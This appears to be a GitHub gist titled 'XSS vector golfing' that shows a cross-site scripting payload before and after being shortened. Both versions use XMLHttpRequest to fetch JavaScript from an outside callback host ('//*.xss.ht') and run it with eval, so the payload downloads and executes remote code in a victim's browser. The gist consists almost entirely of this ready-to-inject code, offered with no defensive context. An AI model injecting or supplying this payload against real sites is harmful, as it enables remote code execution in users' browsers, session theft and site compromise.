Skip to content

Instantly share code, notes, and snippets.

@Prinzhorn Prinzhorn/xss-golf.js
Last active Jul 26, 2017

Embed
What would you like to do?
XSS vector golfing
//Before
function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//*.xss.ht");a.send();
//After
with(new XMLHttpRequest){onload=a=>eval(responseText);open("GET", "//*.xss.ht");send()}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.